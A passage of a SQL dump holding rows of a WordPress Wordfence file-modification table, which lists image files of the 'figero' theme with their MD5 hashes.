(0x6c8087b80fa151f8bb18fa7c4893d789, 'wp-content/themes/figero/images/comma.png', 1, 0x00000000000000000000000000000000, 0x93235ee0a743b776dd4d304e7c10adc5),
(0x109f7a88dab309bd9065a55f55a2319b, 'wp-content/themes/figero/images/comments3.png', 1, 0x00000000000000000000000000000000, 0x6a3473d6a9daa2e359e84304c517bfb2),
(0x61d0c3aa8fb1929799abbce334b3061c, 'wp-content/themes/figero/images/content-border.png', 1, 0x00000000000000000000000000000000, 0x6a87ee9af49f7d957a61e13d61e505f1),
(0xb5a0b4ac154dd6a967e45e55ece1ca8f, 'wp-content/themes/figero/images/css3buttons_backgrounds.png', 1, 0x00000000000000000000000000000000, 0x6612d20975c20cb5fab2015dc4614379),
(0xb62555410bee5e1e84f12d4d1e934bf6, 'wp-content/themes/figero/images/css3buttons_icons.png', 1, 0x00000000000000000000000000000000, 0x0107f689fb00a6665444e631669048c3),
(0xe380fbe66744f371ba313cc3c4d9147e, 'wp-content/themes/figero/images/end-strip.png', 1, 0x00000000000000000000000000000000, 0x357f91d97f575c331911ade98b2d2384),
(0x00e1d21d982714de8565d87b13ce183b, 'wp-content/themes/figero/images/f.png', 1, 0x00000000000000000000000000000000, 0x5bfc0e939a69705d67c62b34637a333e),
(0xa2749ad49241065dc9985ed659342c63, 'wp-content/themes/figero/images/facebook.png', 1, 0x00000000000000000000000000000000, 0x19f875e547b8bdedde480fb73ee8c573),
(0x7a3001945e17131703785a6e644ede85, 'wp-content/themes/figero/images/findusfacebook.png', 0, 0xbc36592dd3fea773f282facdb671b043, 0xbc36592dd3fea773f282facdb671b043),
(0x8eb8bb13fd249b42e16b4ad30586a817, 'wp-content/themes/figero/images/footer-background-blue.png', 1, 0x00000000000000000000000000000000, 0x64759d3151a6bb64234545a75464b058),
(0x07ad7a9a6492d5894d58625ce9c3844f, 'wp-content/themes/figero/images/footer-background-skyblue.png', 1, 0x00000000000000000000000000000000, 0xacf649cf994dfbbc00a64586b8477348),
(0x975c5f75d5fda2007c5592202097bae7, 'wp-content/themes/figero/images/footer-background.png', 1, 0x00000000000000000000000000000000, 0x008d7454a017cc33f5b734f68ff1b3ca),
(0x5d0a7cbf0c5d4bf8b418c6903ac228c3, 'wp-content/themes/figero/images/footer-line.png', 1, 0x00000000000000000000000000000000, 0x02d0a73bd8c99946c29640552323dfa5),
(0x5906fdd5c7e8a504fed5d0edd90bf1fa, 'wp-content/themes/figero/images/footer-line1.png', 1, 0x00000000000000000000000000000000, 0xa455a8cfc5fb461c285879536dae9b2e),
(0x71cad013a83bea20ba66bee855e9a50c, 'wp-content/themes/figero/images/footer-line2-blue.png', 1, 0x00000000000000000000000000000000, 0xdd42e8d13fbc97ddff6e2b49f405d80a),
(0xe1f98d44ba7f8494abd66e88d44d4473, 'wp-content/themes/figero/images/footer-line2-brown.png', 1, 0x00000000000000000000000000000000, 0xef2a16e316e0234c05bfeaebd343d07e),
(0x24e9b23c8d8feaeb8704bdc4bda5cdd1, 'wp-content/themes/figero/images/footer-line2-green.png', 1, 0x00000000000000000000000000000000, 0xcfa7bb089cf887c3ec2f347a5464f3a4),
(0xaaab325a681b3ea846b989144cf76aab, 'wp-content/themes/figero/images/footer-line2-orange.gif', 1, 0x00000000000000000000000000000000, 0x70d5b4438c1369b0a463c73e08706fd6),
(0xe79d3b4e666dfa34db1c2b90dc13a0b8, 'wp-content/themes/figero/images/footer-line2-orange.png', 1, 0x00000000000000000000000000000000, 0x7326205e86528f115185a58846da0a62),
(0x1e2d9ab4a70934728a81110a3fc7f9ec, 'wp-content/themes/figero/images/footer-line2-pink.png', 1, 0x00000000000000000000000000000000, 0x24e42a105f3ef2a5a6a44364680d0809),
(0xc363ca9adaec6a3d20605a8dea0136e1, 'wp-content/themes/figero/images/footer-line2-red.png', 1, 0x00000000000000000000000000000000, 0x87c434d568e496f333af36dac73d2154),
(0x2dccf4a6edb915a42f63f8f0ac43e228, 'wp-content/themes/figero/images/footer-line2-skyblue.png', 1, 0x00000000000000000000000000000000, 0xaf03b210b0c6407a7b1c577f19ccfa00),
(0xcb0c24e36ffeecdb58243771be5e2e4f, 'wp-content/themes/figero/images/footer-line2.png', 1, 0x00000000000000000000000000000000, 0xe49517809979489064896f6512f75bad),
(0x4d9cfea50877e332f48ebf7044af4c64, 'wp-content/themes/figero/images/footer-nackground-orange.gif', 1, 0x00000000000000000000000000000000, 0x17c62b4b5ea306db208d9f937ab3cc90),
(0x878783208c7b8378f164af4934860cc5, 'wp-content/themes/figero/images/g-two.png', 1, 0x00000000000000000000000000000000, 0x287e3603271d54f41fa9a7d6e229097d),
(0xae0ca3926f9ef277da6157d03ea22c21, 'wp-content/themes/figero/images/get-it.png', 1, 0x00000000000000000000000000000000, 0xddc522fe33c66635eb315f59cf779223),
(0x24936a95133ceecb7cc4c0289b3c8e35, 'wp-content/themes/figero/images/header-bottom.png', 1, 0x00000000000000000000000000000000, 0x13d0b37145d34b4d1416927d1e05b815),
(0x7a214d86dfadcdfd58b43571fdfd6860, 'wp-content/themes/figero/images/header-bottom1.png', 1, 0x00000000000000000000000000000000, 0x301c3e9a6deab7295cb811fc97159d00),
(0xb2c301e978ac6744c7c7b28780027463, 'wp-content/themes/figero/images/header-strip-blue.png', 1, 0x00000000000000000000000000000000, 0x1814ec7bee839d915e44cbb10fd16f56),
(0xa9227104a9994ce205b16b0cb1d3f4d2, 'wp-content/themes/figero/images/header-strip-brown.png', 1, 0x00000000000000000000000000000000, 0xeeb0cd2c69b37181b8493df674df885e),
(0x46e3c3779092677bae932ae518ac8f52, 'wp-content/themes/figero/images/header-strip-green.png', 1, 0x00000000000000000000000000000000, 0xfb4a51ceaf3380091ef096e0073d902d),
(0x1b20e9f11f89ec103ebeac2328ff57e3, 'wp-content/themes/figero/images/header-strip-orange.gif', 1, 0x00000000000000000000000000000000, 0x362c8cf51a522ef32eeb46a2f7438d66),
(0x3640b6356628b037def90824e614c982, 'wp-content/themes/figero/images/header-strip-orange.png', 1, 0x00000000000000000000000000000000, 0x95db2461a9ad58c955d0dfb76084e26e),
(0x24ed5ccd4b352ee4ed86d224858bfa64, 'wp-content/themes/figero/images/header-strip-pink.png', 1, 0x00000000000000000000000000000000, 0xff2596a54ecdee319013d594445dc625),
(0xede7ef3367c01fe218ee889a0ff93b41, 'wp-content/themes/figero/images/header-strip-red.png', 1, 0x00000000000000000000000000000000, 0x09954cde9d4e51e617be1ace42f39db4),
(0x6d943b27a2583df18c4154cd127be48e, 'wp-content/themes/figero/images/header-strip-skyblue.png', 1, 0x00000000000000000000000000000000, 0x6c63814bcf6271d3cfd6129eeaa2db4b),
(0x412b30e365acb67f4672d4ba230fe59f, 'wp-content/themes/figero/images/header-strip.png', 1, 0x00000000000000000000000000000000, 0xfd5502407ee9794f42ac310ae342b137),
(0x3fe213fedf63bb0a6f9e5749b3fe084b, 'wp-content/themes/figero/images/header-strip1.png', 1, 0x00000000000000000000000000000000, 0x155fb071989508a8ce92cbb24c4cc75c),
(0x853ecc5817e9b94339e6e3bac727ff56, 'wp-content/themes/figero/images/image1.png', 1, 0x00000000000000000000000000000000, 0xa179087c8f31ed4d164db4cbc64d74ce),
(0xe83410f27e6479357de12247c618b444, 'wp-content/themes/figero/images/in.png', 1, 0x00000000000000000000000000000000, 0xc950c39655985c9a2e80d1b78301cc96),
(0x19f469075deb23339c2fbbe11be0900b, 'wp-content/themes/figero/images/left-arrow.png', 1, 0x00000000000000000000000000000000, 0x9c78b6b8fd5b9fc7ea1637250eea1351),
(0x4de80784c4c56ca4782fb9d1220a871b, 'wp-content/themes/figero/images/lightclose.gif', 1, 0x00000000000000000000000000000000, 0x2c38ae5be85141bf8867c9523f4bc357),
(0x279e20cd4c30a6abe00780f47fb9d57f, 'wp-content/themes/figero/images/lightnext.gif', 1, 0x00000000000000000000000000000000, 0x23414965ebe526012e473c1d4d65d4e7),
(0x6533ac544f6c87c813149b0ede9c8204, 'wp-content/themes/figero/images/lightprev.gif', 1, 0x00000000000000000000000000000000, 0x5a9118de4ef6226473190d6e82f6d80d),
(0x0297d659a7041b84dcd80826cb5eb941, 'wp-content/themes/figero/images/line.png', 1, 0x00000000000000000000000000000000, 0xde73bd3b1487c05313734f073420bf31),
(0x52ab392910195cb3ea40fa150f66abb0, 'wp-content/themes/figero/images/link-1-red.png', 1, 0x00000000000000000000000000000000, 0xc6ffecfce167cbc8b53a20bf88dd5db4),
(0xc8be9797db5cba30539636fcc5be5b96, 'wp-content/themes/figero/images/link-1.png', 1, 0x00000000000000000000000000000000, 0x743b08fe6d0d2d44e86574da1d9454ee),
(0x7c20fc8d31416246d25af0bf5ff928eb, 'wp-content/themes/figero/images/link-2-red.png', 1, 0x00000000000000000000000000000000, 0x9b57f719c968b6b093313ccb18b46fa1),
(0x5ff0510c35e6e53b1c6866e7a0b5abc9, 'wp-content/themes/figero/images/link-2.png', 1, 0x00000000000000000000000000000000, 0x1fb9db8b3277ffd851b2c7534ef492b2),
(0x5b3b738a155e767f150e2d27b6d95c01, 'wp-content/themes/figero/images/link-3-red.png', 1, 0x00000000000000000000000000000000, 0x36470306c8472b56dc42e1ce7654ffb5),
(0x782b1ce5929dfb2897a4ad95df442e7f, 'wp-content/themes/figero/images/link-3.png', 1, 0x00000000000000000000000000000000, 0xf230545e22328af2c3ad64f65f5dee06),
(0x16c3bcfe312fa0bc140c9880ddf4316a, 'wp-content/themes/figero/images/link-4-red.png', 1, 0x00000000000000000000000000000000, 0x31356a5f0add2cd09cda1d2f8fb2ad8b),
(0x5b5b37ec8de81101c9a4cf1cfa3852fd, 'wp-content/themes/figero/images/link-4.png', 1, 0x00000000000000000000000000000000, 0x2d285d4f0ce501151fcfc283cc928512),
(0x3f407a3f4c3a0098e21cd39a06d86282, 'wp-content/themes/figero/images/link-5-red.png', 1, 0x00000000000000000000000000000000, 0x9b403dd15ef5c71a809bda3d78baee39),
(0xa03044f578f33f536b2ad58088f06cb9, 'wp-content/themes/figero/images/link-5.png', 1, 0x00000000000000000000000000000000, 0x299f3caece3d5bc71f7b74f6e1be97cc),
(0xd43a362e4c74db45aab25d9542d0429b, 'wp-content/themes/figero/images/link-6.png', 1, 0x00000000000000000000000000000000, 0x66a4d6ebd734b81535bf1060fdcba3c1),
(0x43749aacdb43350e2893c698ddff230f, 'wp-content/themes/figero/images/list-strip.png', 1, 0x00000000000000000000000000000000, 0x095650ce8cb29c1a7f303c7ce8040722),
(0x8379ba6a5afd96ebf4289df94fd6ecb0, 'wp-content/themes/figero/images/loader.png', 1, 0x00000000000000000000000000000000, 0x66cdf8d9cd5089c45c74e75f9d81a3bc),
(0x9446323dc976f581e9960d9ee3185f0f, 'wp-content/themes/figero/images/logo.png', 1, 0x00000000000000000000000000000000, 0x40a8d6699902ef2cd1470c580e0e57bb),
(0x98888b074cabe468e3a939d498b43f2d, 'wp-content/themes/figero/images/logo123.png', 1, 0x00000000000000000000000000000000, 0x868767a2681cffed0eebaccc10311a0a),
(0xc8cf4222e991fdb165f5288b58b767c5, 'wp-content/themes/figero/images/menu-border.png', 1, 0x00000000000000000000000000000000, 0x105305524eb2c4f55aaffb808f27ac95),
(0x78558371ba3b6d20ac7f30ea604c6b69, 'wp-content/themes/figero/images/name-field.png', 1, 0x00000000000000000000000000000000, 0xd9f17276782ede71bc90b85ff0723280),
(0xf90f7a41af93c2d84cdaa12b56447cd9, 'wp-content/themes/figero/images/neeraj.jpg', 1, 0x00000000000000000000000000000000, 0xa9d8be9a3ed82a321df000a82b921cd8),
(0x30a3d5debd01e487932f669938b96abe, 'wp-content/themes/figero/images/next-black.png', 1, 0x00000000000000000000000000000000, 0xf6e72d6370b00b4d9a087be64ed3a282),
(0xd7e426ec5481c0dc2b0e68435eb2877e, 'wp-content/themes/figero/images/next-blue.png', 1, 0x00000000000000000000000000000000, 0x5b7ef9108a75f7fe12e20b0411b0d8fe),
(0x1b664b20cbeaa53687b4b33b1a845d03, 'wp-content/themes/figero/images/next-skyblue.png', 1, 0x00000000000000000000000000000000, 0xd5653aada2c8f7585eeec47ae28d1f6e),
(0x52fc1ef3a58b67b1a99a2c127064d76c, 'wp-content/themes/figero/images/next.png', 1, 0x00000000000000000000000000000000, 0x92f82c22b2d40336a9a0595a90751ccb),
(0x640283bde87531beddb0552d5b98af3c, 'wp-content/themes/figero/images/page-info-strip.png', 1, 0x00000000000000000000000000000000, 0x606e8b7d7dbd9b2197bbc72281802abd),
(0x0b3827f001af87a8129ae5e1d67cf440, 'wp-content/themes/figero/images/pagination.png', 1, 0x00000000000000000000000000000000, 0x999ddddbf12a93103b33f068da47a578),
(0xcadddabb69c53d54bad5de4db7fc51a3, 'wp-content/themes/figero/images/pattern.jpg', 1, 0x00000000000000000000000000000000, 0x9a3e6b4be6e311d3dfeca78711dcad93),
(0x527fdda4e16521337626d6232e66c47c, 'wp-content/themes/figero/images/port-stripbg.png', 1, 0x00000000000000000000000000000000, 0x1e70d0e71395279f088e2147639d9299),
(0x9b5cce1c8c2348e3b6d55e504075b100, 'wp-content/themes/figero/images/portbg.png', 1, 0x00000000000000000000000000000000, 0x21f0e56c169dac3c4bf80cd73f3ae36d),
(0x71552a62037297e9a52ce9d06f7579bc, 'wp-content/themes/figero/images/ppnext.png', 1, 0x00000000000000000000000000000000, 0xb8d4bf8440aae57321064ecaf2efea7e),
(0x16a4cee85f969b221a2ba5a56dd20fa5, 'wp-content/themes/figero/images/ppprev.png', 1, 0x00000000000000000000000000000000, 0xb251170307bcb724ac5b4e97482dc6ed),
(0x1c611d249a3e0c6af61210ceb42ad431, 'wp-content/themes/figero/images/ppsprite.png', 1, 0x00000000000000000000000000000000, 0xa157ef765ce8288984373a7eba6b9a23),
(0xa12671ea0ed4bcfb72a0ce4b4bb897e2, 'wp-content/themes/figero/images/prev-black.png', 1, 0x00000000000000000000000000000000, 0xa47fae41515d56e85faa12d6fea632d9),
(0xba6b8f8d219a8bf32569f77f6d709faa, 'wp-content/themes/figero/images/prev-blue.png', 1, 0x00000000000000000000000000000000, 0xdc8373e5c45d2c680a60a5c9b258e3ed),
(0x692c5d7e0aa5225ce80f7c2a30cf33e5, 'wp-content/themes/figero/images/prev-skyblue.png', 1, 0x00000000000000000000000000000000, 0x4f834a33421b40178ac160cb21533fd6),
(0x3523e27e72c59aff001c54fc65976d27, 'wp-content/themes/figero/images/prev.png', 1, 0x00000000000000000000000000000000, 0xc6ac205eedb4903e911e2b82cd6a1090),
(0x7aa0ddd4e3e8c69e8de99b65b6c433a0, 'wp-content/themes/figero/images/right-arrow.png', 1, 0x00000000000000000000000000000000, 0x79ff1d1c2f39b20d0729d5b225fbdc22),
(0x2631a05342e77e5c6648150b8dc716cd, 'wp-content/themes/figero/images/rss.png', 1, 0x00000000000000000000000000000000, 0x03f384957b0c71b0c5aaa5be7f20586f),
(0x51bbe96edbef4ad9a785f77d69f56366, 'wp-content/themes/figero/images/sca.png', 1, 0x00000000000000000000000000000000, 0x751cf8b599787288bcb4a935047057e3),
(0x28ab91a9f6938ba491964a485f21c9d2, 'wp-content/themes/figero/images/scale.png', 1, 0x00000000000000000000000000000000, 0xbe376b0192d28fd60a99e99834d1fa0b),
(0xa0471fbbacf5c1d527ec4d496bc216fc, 'wp-content/themes/figero/images/scale1.png', 1, 0x00000000000000000000000000000000, 0x00ca6ed876230198c3995f028120fc63),
(0xd87e38de44c7bbdaf8ed168ec375c106, 'wp-content/themes/figero/images/scale10.png', 1, 0x00000000000000000000000000000000, 0x97d5e541b502031a0192600901459d95),
(0x5ed7cebd0a6fbad320bc772b7553108a, 'wp-content/themes/figero/images/scale11.png', 1, 0x00000000000000000000000000000000, 0x01860bf0fa0ac514a49035c15ac1cfe0),
(0xcfd546d633a55c3d4231d3b64d2a0cee, 'wp-content/themes/figero/images/scale2.png', 1, 0x00000000000000000000000000000000, 0x066d9bdb080ca0c68deb498bd91fc41e),
(0x90261ef21651ec67b8d417ddf735a112, 'wp-content/themes/figero/images/scale3.png', 1, 0x00000000000000000000000000000000, 0x7825341ab80543e4859a8abe6ec208ba),
(0x6348936d74c33eb2b4af282fe7be1ccf, 'wp-content/themes/figero/images/scale4.png', 1, 0x00000000000000000000000000000000, 0xb2d37b65aa7bae6a4d442e75f1ee7862),
(0x9e7f684d630c254a01b1b42cdd988a1d, 'wp-content/themes/figero/images/scale5.png', 1, 0x00000000000000000000000000000000, 0x24c4904d926f6737ec1e066a92b530ca),
(0x230b367d6d9796d4ade400117e9e1542, 'wp-content/themes/figero/images/scale6.png', 1, 0x00000000000000000000000000000000, 0x294ee38458e0654a86abc5c187ffeba2),
(0x1597535c8877ab2de8c17642690e9bd5, 'wp-content/themes/figero/images/scale7.png', 1, 0x00000000000000000000000000000000, 0x2f1c485a858dd5aa51d9e47d713e6a38),
(0x67e9a0b7c8c7dfb64607aec5e4a7dfb6, 'wp-content/themes/figero/images/scale8.png', 1, 0x00000000000000000000000000000000, 0x03a9b227bef491b88694d9f6a083db1a),
(0xe236743590fed1ab440f258b20ab7481, 'wp-content/themes/figero/images/scale9.png', 1, 0x00000000000000000000000000000000, 0xabdfa871e129a4603295f454fe650c41),
(0x7f230f5e718529adf9227571a6fb56a9, 'wp-content/themes/figero/images/seach.png', 1, 0x00000000000000000000000000000000, 0x12a6dc81d1f6193e447605766443dd43),
(0x11d9a7962b21027b8525f6f5e1f41369, 'wp-content/themes/figero/images/search-bg.png', 1, 0x00000000000000000000000000000000, 0xe1f9064806e2aba354684bebdadb1a87),
(0xccac0b475980865891c98cdf155fe830, 'wp-content/themes/figero/images/search.png', 1, 0x00000000000000000000000000000000, 0x12a6dc81d1f6193e447605766443dd43),
(0xe2bdf17c1caf5ccacc3fa9d370a4b77a, 'wp-content/themes/figero/images/searchbg-blue.png', 1, 0x00000000000000000000000000000000, 0xbdc47c3d60754130f587d0a7126073c4),
(0x3521c150fc28af5c93d1aa7adf4b8c2e, 'wp-content/themes/figero/images/searchbg-skyblue.png', 1, 0x00000000000000000000000000000000, 0xa923a474393ae1b200b9c67b2261829b),
(0xcfcec9c7debf25c3718e5559850923c1, 'wp-content/themes/figero/images/searchbg.png', 1, 0x00000000000000000000000000000000, 0x998698c3d6fa24a93e7f01c2f2dcedc7),
(0xefe28a4ab9fb425cfe93233361070435, 'wp-content/themes/figero/images/second-header.png', 1, 0x00000000000000000000000000000000, 0x817ae7d1710cfbba56f53fdb5dd56c3f),
(0x501ad2ca217b2bc953f3340910a2d91f, 'wp-content/themes/figero/images/seprater.png', 1, 0x00000000000000000000000000000000, 0xa40d35b7a79403918620a7f802ed3b43),
(0x42dc7fc1a16ff78094f88a59ecc006ec, 'wp-content/themes/figero/images/shadow-gall.png', 1, 0x00000000000000000000000000000000, 0xb488a9fa11694689aac33212913303c4),
(0x69d780ba6a0d6ea4d4cd76c3d45c383b, 'wp-content/themes/figero/images/shadow.png', 1, 0x00000000000000000000000000000000, 0xe7ca1a12c746c49923cdf9b3965d886f),
(0x3cf5b40d5159d5c9e7f5da6d5a535766, 'wp-content/themes/figero/images/shadow1.png', 1, 0x00000000000000000000000000000000, 0xa3f279ae299f610854f6cfe641e56a59),
(0x87180f41913a5a588390de56bca9931b, 'wp-content/themes/figero/images/simpleclose.png', 1, 0x00000000000000000000000000000000, 0x7a506161878e748291da5aae0e525fa8),
(0xbb1036313ba9104e2021d9df3a8f8cf9, 'wp-content/themes/figero/images/simplenav.png', 1, 0x00000000000000000000000000000000, 0x38f3be44b3d26c9b6ac2d394ed6033e9),
(0xdfb64e4c3cfbb497097bc42cbf724312, 'wp-content/themes/figero/images/slider-heading-line.png', 1, 0x00000000000000000000000000000000, 0x5b13fd67e74b7d3265558af884a6fd3e),
(0xcd0d6cd85e0b7c48054a7cde6a27d014, 'wp-content/themes/figero/images/slider-strip-black.png', 1, 0x00000000000000000000000000000000, 0xfbf52dd4f44730906a7a0a8809c8fbc2),
(0xc893a1a12495550b61c29fd9f27ea161, 'wp-content/themes/figero/images/slider-strip-blue.png', 1, 0x00000000000000000000000000000000, 0xac657eab3f0eff3b5c0807fb164a1642),
(0x17e64b5bb58a0b1f9e256553d23aaa53, 'wp-content/themes/figero/images/slider-strip-brown.png', 1, 0x00000000000000000000000000000000, 0xf4d8312c91244010893dfe0cbd8e8808),
(0x3909cd8129e541ebae8fb8f7313e38cc, 'wp-content/themes/figero/images/slider-strip-green.png', 1, 0x00000000000000000000000000000000, 0x89e120a1e0c9f10175abd3cfb66fafea),
(0x9993b960ede576efd80d1a3be1958596, 'wp-content/themes/figero/images/slider-strip-orange.png', 1, 0x00000000000000000000000000000000, 0xe6fc80f99d827b88f5651fc11371a5ff),
(0x75416cf4c44854a14a21621746671929, 'wp-content/themes/figero/images/slider-strip-pink.png', 1, 0x00000000000000000000000000000000, 0xe4a98f558132644071e0e63bdc9ae2ea),
(0xa4f6a57f94aaf7788ca5c566999fb911, 'wp-content/themes/figero/images/slider-strip-red.png', 1, 0x00000000000000000000000000000000, 0x4a44be6b83683e8acf625769a07ef808),
(0x85d6d408a769e5d218d38d1b83fc91f5, 'wp-content/themes/figero/images/slider-strip-skyblue.png', 1, 0x00000000000000000000000000000000, 0x1b9fa4289ec3a24923c801a7f2f38ec8),
(0x4384c734adc3e5da4f3cd44d30f1357f, 'wp-content/themes/figero/images/slider-strip-yellow.png', 1, 0x00000000000000000000000000000000, 0xbd62d21a6af7dbfe77c71cf10b02711e),
(0xa3113fa46e82f83fe39fe50b81e28ec8, 'wp-content/themes/figero/images/slider-strip.png', 1, 0x00000000000000000000000000000000, 0x35e5b473446d72cdb356f83310b26ab9),
(0x4736f8197ac3621c755ef6b50a27333d, 'wp-content/themes/figero/images/sliderbg-black.png', 1, 0x00000000000000000000000000000000, 0x09a927b77e42df4445c64bc01b2030db),
(0xd68c2386f64f787937bc3dd8ba201d9f, 'wp-content/themes/figero/images/sliderbg-blue.png', 1, 0x00000000000000000000000000000000, 0x4d85bb1f021f5510ca6c0f605fdf72ff),
(0x2a0a0e01582177a9b033f24dd740ee26, 'wp-content/themes/figero/images/sliderbg-brown.png', 1, 0x00000000000000000000000000000000, 0x4f641d72b94a5125ac7bbc444a66514a),
(0xacfa2b32a350829af7376fa13c15461f, 'wp-content/themes/figero/images/sliderbg-green.png', 1, 0x00000000000000000000000000000000, 0x1b31525af2855b0585fe60abe0ff220d),
(0x736265f092e0f196e7801bad97b5079a, 'wp-content/themes/figero/images/sliderbg-orange.gif', 1, 0x00000000000000000000000000000000, 0xbd5a50ad8312083acba8967bf3af829e),
(0x06ff247cbaf01b2f6e013c740eec7b92, 'wp-content/themes/figero/images/sliderbg-orange.png', 1, 0x00000000000000000000000000000000, 0xcb9c9c0ecd9dfcc79865e73c5c891935),
(0x46d7580612e6455ff580fb3b8cabfc96, 'wp-content/themes/figero/images/sliderbg-pink.png', 1, 0x00000000000000000000000000000000, 0x02133452eee2528e6ce62937518b07ee),
(0xa0f50b1ead67b3b96bc8b3d146bfef95, 'wp-content/themes/figero/images/sliderbg-red.png', 1, 0x00000000000000000000000000000000, 0xa180ee129a77332dcc9a7946bc7f8264),
(0xa3c88e6f99c09906e4ebae6705eb0bde, 'wp-content/themes/figero/images/sliderbg-skyblue.png', 1, 0x00000000000000000000000000000000, 0x9e50e56de1d0ed57e36c6395c8687039),
(0xf7954f63104032f492253729edd159fd, 'wp-content/themes/figero/images/sliderbg-yellow.png', 1, 0x00000000000000000000000000000000, 0xf5b67bae188cbae0e92f53f9ebf24d70),
(0x8bfad78c62e7ec82a8133f08911b0749, 'wp-content/themes/figero/images/sliderbg.png', 1, 0x00000000000000000000000000000000, 0x231cd3ad5976379fade8eb9658e868b5),
(0x44e7a5b76ea02598d6a400d21025c069, 'wp-content/themes/figero/images/sliderbg1.png', 1, 0x00000000000000000000000000000000, 0x29f517734f027b27ff3e7f60feec9970),
(0x2cbb67e6f1f884e15c0fe1e323fe90ec, 'wp-content/themes/figero/images/sliderbg2.png', 1, 0x00000000000000000000000000000000, 0x96795ff7db16d9d15d55378d2e0dd5e5),
(0xb1d057f568ebeaac995f52a580227832, 'wp-content/themes/figero/images/sliderbg3.png', 1, 0x00000000000000000000000000000000, 0xc268666013d8f91767f773fee94c8d07),
(0x0e1dfb5b0de54114fc5657f6a92f806a, 'wp-content/themes/figero/images/sliderbg4.png', 1, 0x00000000000000000000000000000000, 0x61627ba025894c2c7c58e080413676e2),
(0x9433d0b501b8c11c941abc9d3c67db1e, 'wp-content/themes/figero/images/sliderbg5.png', 1, 0x00000000000000000000000000000000, 0x449f74a5f8c911098ad777065db091a5),
(0x14b3aebb2ef062ee0ccdab803086e251, 'wp-content/themes/figero/images/sliderbg6.png', 1, 0x00000000000000000000000000000000, 0xb87cefb9bd2ad0842f295710dc3ebf36),
(0x6c5102a2a13f5fc1304844fd4e335428, 'wp-content/themes/figero/images/strip-line-blcak.png', 1, 0x00000000000000000000000000000000, 0xca0ba830c58177becb19a99722fd770e),
(0x6a097094280e8c812f9949e22d5ed4d3, 'wp-content/themes/figero/images/strip-line-green.png', 1, 0x00000000000000000000000000000000, 0x9523b9e18d0a58953d179d44d029266d),
(0x6161458f93491e15fdd829dce4a9ae17, 'wp-content/themes/figero/images/strip-line-orange.png', 1, 0x00000000000000000000000000000000, 0x28ae2b5b4a4e4239027ba2e7533fee67),
(0x41399d126f826c33200fa4ae12ad0f25, 'wp-content/themes/figero/images/strip-line-pink.png', 1, 0x00000000000000000000000000000000, 0x2a19a341f49b9671a2819a63f56ee167),
(0x48f2ad14aef82235c6428db6df393269, 'wp-content/themes/figero/images/strip-line-red.png', 1, 0x00000000000000000000000000000000, 0x39100c46dfbed13d5279f79b6b9e5a4a),
(0xe7fb28bb46a4fb975d0e2c63bb854fb9, 'wp-content/themes/figero/images/strip-line-yellow.png', 1, 0x00000000000000000000000000000000, 0x8b1c294884473128d28a6eed6ec484e6),
(0x96b7a740a76bb31a5cc2c99c456b1119, 'wp-content/themes/figero/images/strip-line.png', 1, 0x00000000000000000000000000000000, 0xbef6305bdf28d6dd22ffb5f94b7f9d26),
(0x937ebf447bd8843c697218b4fb49f7f7, 'wp-content/themes/figero/images/strip.png', 1, 0x00000000000000000000000000000000, 0x56c6bbbab65ab9ed2da981515b4cbc7c),
(0xa7f75bc61c10b7f1f63dbccae79fd8c6, 'wp-content/themes/figero/images/sub.png', 1, 0x00000000000000000000000000000000, 0xa6dcdabbfe09c208348927dde587194f),
(0x90163469ea0f7dca583ee7b72bd16ac0, 'wp-content/themes/figero/images/subheadstrip-black.png', 1, 0x00000000000000000000000000000000, 0xe512fe3939b2cb2c185dae58f4cc3918),
(0x313c2b1839a6619e6042c0b3e3228cac, 'wp-content/themes/figero/images/subheadstrip-green.png', 1, 0x00000000000000000000000000000000, 0xf22b9a44c6fd8b6b409153493195a85a),
(0x8b38418cfdeb69457d411bc6e7dc1266, 'wp-content/themes/figero/images/subheadstrip-orangepng.png', 1, 0x00000000000000000000000000000000, 0x63ca3134c3f8375c3037f034273f3de3),
(0xd8784dfa3bdad3f8d7ad950ca8c1b298, 'wp-content/themes/figero/images/subheadstrip-pink.png', 1, 0x00000000000000000000000000000000, 0x0edf32c2adfa38917dd307b045a11159),
(0x795b3722f94bab8050b9fb60b78b10af, 'wp-content/themes/figero/images/subheadstrip-red.png', 1, 0x00000000000000000000000000000000, 0xaabb1c12da9330decc2bd98f261e44f3),
(0x2d97d4e98614f32171e8d6c8baba0c02, 'wp-content/themes/figero/images/subheadstrip-yellow.png', 1, 0x00000000000000000000000000000000, 0x146577dec154189306971d32e4dd068a),
(0x714ab52b8f286832e5a666dbadf3afbb, 'wp-content/themes/figero/images/subheadstrip.png', 1, 0x00000000000000000000000000000000, 0x35ef1fe282590e8e5fa9e6c241286c7c);
INSERT INTO `wp_wfFileMods` (`filenameMD5`, `filename`, `knownFile`, `oldMD5`, `newMD5`) VALUES
(0xb93549e514b5bd8256f497f24fe698e7, 'wp-content/themes/figero/images/submit.png', 1, 0x00000000000000000000000000000000, 0xbc96f62fc3cc8c4f9cd38ec377f73c6f),
(0x25d41fe8b3269a22d65540d94de24602, 'wp-content/themes/figero/images/t.png', 1, 0x00000000000000000000000000000000, 0x61c2a44e3627e32f29088a7cae4310d9),
(0x6a794fc71f9827acefc5a3f183eb877e, 'wp-content/themes/figero/images/text-area-top.png', 1, 0x00000000000000000000000000000000, 0xdd1641f6f503ad4e1426ca8efd63f4a0),
(0xfa898cfadc4bd69cb9d73f8619732046, 'wp-content/themes/figero/images/text-area.png', 1, 0x00000000000000000000000000000000, 0x2e9f84d7763645aaefef7fc03fbd6134),
(0x7f5418d57cf75874e214aac09d207d8d, 'wp-content/themes/figero/images/text-field.png', 1, 0x00000000000000000000000000000000, 0xefb46a4b0bbe76ec384f147915028a3b),
(0x5797a277a3dec77e3c9424b24857cbca, 'wp-content/themes/figero/images/tipsy.gif', 1, 0x00000000000000000000000000000000, 0x84c683bb61e04eed786306a59ae8cbf5),
(0x81b8ebabba2178211d7756b5fb1bdd4a, 'wp-content/themes/figero/images/tipsy.png', 1, 0x00000000000000000000000000000000, 0xbec682d2c58246485f1d6ac318dfa922),
(0x91704b830c4ca8f6d80f898c88742719, 'wp-content/themes/figero/images/top-strip-black.png', 1, 0x00000000000000000000000000000000, 0xc191e4d4e1f0953174fcb66562edafb8),
(0x81d89a84e968e23faefd5cb62877d37b, 'wp-content/themes/figero/images/top-strip-green.png', 1, 0x00000000000000000000000000000000, 0xe94f317010aa00b6c82ab9ce79233eb1),
(0x7c142717da70f8420d318c8c0a84a718, 'wp-content/themes/figero/images/top-strip-orange.png', 1, 0x00000000000000000000000000000000, 0x1798a2348c96f75005c6f19788564cdc),
